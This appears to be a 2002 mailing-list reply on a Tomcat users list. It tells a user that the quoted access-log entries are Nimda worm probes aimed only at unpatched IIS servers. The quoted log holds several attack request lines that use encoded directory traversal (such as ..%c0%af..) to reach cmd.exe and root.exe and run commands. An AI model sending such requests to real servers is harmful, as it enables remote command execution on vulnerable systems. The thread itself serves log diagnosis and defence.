This is simply some Windows server that is infected with the Nimbda Worm looking for a new place to crawl to. It only infects non-patched IIS servers, so for Tomcat stand-alone or Apache, you can safely ignore it.
"Laszlo Nadai" <[EMAIL PROTECTED]> wrote in message [EMAIL PROTECTED]">news:[EMAIL PROTECTED]... > I am fairly new to Tomcat, scripts, etc. > I found the following and similar entries in my access log file: > > 64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 624 > 64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 618 > 64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 > 64.160.45.159 - - [28/Dec/2002:15:00:18 -0800] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 > 64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718 > 64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687 > 64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687 > 64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721 > 64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715 > 64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 624 > 64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 618 > 64.160.45.159 - - [28/Dec/2002:16:01:58 -0800] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 > 64.160.45.159 - - [28/Dec/2002:16:02:00 -0800] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 > 64.160.45.159 - - [28/Dec/2002:16:02:04 -0800] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718 > 64.160.45.159 - - [28/Dec/2002:16:02:06 -0800] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687 > 64.160.45.159 - - [28/Dec/2002:16:02:07 -0800] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687 > 64.160.45.159 - - [28/Dec/2002:16:02:09 -0800] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721 > 64.160.45.159 - - [28/Dec/2002:16:02:10 -0800] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715 > 64.165.213.97 - - [28/Dec/2002:16:38:12 -0800] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 624 > 64.165.213.97 - - [28/Dec/2002:16:38:16 -0800] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 618 > 64.165.213.97 - - [28/Dec/2002:16:38:20 -0800] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 > 64.165.213.97 - - [28/Dec/2002:16:38:24 -0800] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 > > Can someone tell me what someone else was trying to do? > Based on the log, should I change any settings in my config? > > Thanks, > laszlo > > > - > [This E-mail scanned for viruses by declude AntiVirus Software] -- To unsubscribe, e-mail: <mailto:[EMAIL PROTECTED]> For additional commands, e-mail: <mailto:[EMAIL PROTECTED]>
